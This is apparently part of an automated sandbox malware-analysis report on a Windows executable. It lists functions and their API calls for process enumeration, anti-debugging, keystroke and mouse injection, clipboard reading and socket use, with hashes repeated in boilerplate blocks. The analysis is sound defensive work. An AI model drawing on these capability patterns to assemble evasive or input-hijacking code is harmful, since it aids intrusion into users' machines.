                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                                                                                                • API String ID: 0-2872873767
                                                                                                                                                                                                                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                                                                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                                                                                                                Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00475657
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2547909840-0
                                                                                                                                                                                                                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                                                                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                                                                                                                Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                                                                                                                • String ID: *.*$\VH
                                                                                                                                                                                                                • API String ID: 2786137511-2657498754
                                                                                                                                                                                                                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                                                                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                                                                                                                Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                • String ID: pqI
                                                                                                                                                                                                                • API String ID: 2579439406-2459173057
                                                                                                                                                                                                                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                                                                                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                                                                                                                Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsicollmouse_event
                                                                                                                                                                                                                • String ID: DOWN
                                                                                                                                                                                                                • API String ID: 1033544147-711622031
                                                                                                                                                                                                                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                                                                                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                                                                                                                Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3031425849-0
                                                                                                                                                                                                                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                                                                                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                                                                                                                Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4170576061-0
                                                                                                                                                                                                                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                                                                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                                                                                                                Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                                                                                                                • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                                                                                                                • IsIconic.USER32 ref: 0047A393
                                                                                                                                                                                                                • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 292994002-0
                                                                                                                                                                                                                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                                                                                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                                                                                                                Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                                                                                • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                                                                                                • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                                                                                                                Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15083398-0
                                                                                                                                                                                                                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                                                                                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                                                                                                                Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: U$\
                                                                                                                                                                                                                • API String ID: 4104443479-100911408
                                                                                                                                                                                                                • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                                                                                                • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                                                                                                                                Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
